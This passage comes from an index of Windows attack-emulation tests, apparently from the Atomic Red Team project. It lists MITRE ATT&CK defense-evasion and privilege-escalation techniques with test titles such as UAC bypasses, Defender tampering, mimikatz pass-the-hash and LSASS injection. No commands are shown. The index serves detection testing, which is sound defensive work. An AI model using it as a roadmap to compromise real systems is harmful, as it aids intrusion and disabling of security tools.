- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- [T1036.004 Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- T1191 CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
- Atomic Test #1: Mount ISO image [windows]
- Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- Atomic Test #3: Remove the Zone.Identifier alternate data stream [windows]
- Atomic Test #4: Execute LNK file from ISO [windows]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.005 Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
- Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
- Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
- Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
- Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
- Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- Atomic Test #10: Mshta used to Execute PowerShell [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- Atomic Test #3: Launch NSudo Executable [windows]
- Atomic Test #4: Bad Potato [windows]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #3: Create Hidden User in Registry [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.003 Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1502 Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.001 Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
- Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
- Atomic Test #5: Invoke CHM Simulate Double click [windows]
- Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
- Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- Atomic Test #8: Decompile Local CHM File [windows]
- [T1070.005 Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
- Atomic Test #4: Disable Administrative Share Creation at Startup [windows]
- Atomic Test #5: Remove Administrative Shares [windows]
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #10: Unload Sysmon Filter Driver [windows]
- Atomic Test #11: Uninstall Sysmon [windows]
- Atomic Test #12: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #13: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #14: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #15: Tamper with Windows Defender ATP PowerShell [windows]
- Atomic Test #16: Tamper with Windows Defender Command Prompt [windows]
- Atomic Test #17: Tamper with Windows Defender Registry [windows]
- Atomic Test #18: Disable Microsoft Office Security Features [windows]
- Atomic Test #19: Remove Windows Defender Definition Files [windows]
- Atomic Test #20: Stop and Remove Arbitrary Security Windows Service [windows]
- Atomic Test #21: Uninstall Crowdstrike Falcon on Windows [windows]
- Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
- Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- Atomic Test #26: Disable Windows Defender with DISM [windows]
- Atomic Test #27: Disable Defender with Defender Control [windows]
- Atomic Test #28: Disable Defender Using NirSoft AdvancedRun [windows]
- Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
- Atomic Test #30: WinPwn - Kill the event log services for stealth [windows]
- Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
- Atomic Test #32: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd [windows]
- Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd [windows]
- Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
- Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
- Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
- Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1073 DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
- Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
- Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- Atomic Test #7: Obfuscated Command in PowerShell [windows]
- Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
- Atomic Test #1: Register Portable Virtualbox [windows]
- Atomic Test #2: Create and start VirtualBox virtual machine [windows]
- Atomic Test #3: Create and start Hyper-V virtual machine [windows]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.010 Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md)
- Atomic Test #1: Regsvr32 local COM scriptlet execution [windows]
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- Atomic Test #4: Regsvr32 Registering Non DLL [windows]
- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
- Atomic Test #6: Masquerading - non-windows exe running as windows exe [windows]
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- Atomic Test #9: File Extension Masquerading [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1186 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm](../../T1218.009/T1218.009.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #4: Install root CA on Windows [windows]
- Atomic Test #5: Install root CA on Windows with certutil [windows]
- Atomic Test #6: Add Root Certificate to CurrentUser Certificate Store [windows]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- Atomic Test #2: Dynamic C# Compile [windows]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.003 Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #9: Delete Prefetch File [windows]
- Atomic Test #10: Delete TeamViewer Log Files [windows]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1221 Template Injection](../../T1221/T1221.md)
- Atomic Test #1: WINWORD Remote Template Injection [windows]
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.002 Obfuscated Files or Information: Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1220 XSL Script Processing](../../T1220/T1220.md)
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- Atomic Test #8: Hide Files Through Registry [windows]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.004 Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
- T1096 NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
- Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
- Atomic Test #2: Lolbin Jsc.exe compile javascript to dll [windows]
- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# privilege-escalation
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.013 Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- Atomic Test #18: WinPwn - UAC Magic [windows]
- Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
- Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
- Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
- Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
- Atomic Test #23: UAC Bypass with WSReset Registry Modification [windows]
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1178 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1547.010 Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
- Atomic Test #1: Create a new time provider [windows]
- Atomic Test #2: Edit an existing time provider [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
- Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
- Atomic Test #1: Create registry persistence via AppCert DLL [windows]
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- Atomic Test #3: Launch NSudo Executable [windows]
- Atomic Test #4: Bad Potato [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
- Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
- Atomic Test #3: Windows MOFComp.exe Load MOF File [windows]
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- [T1546.001 Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1015 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1502 Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
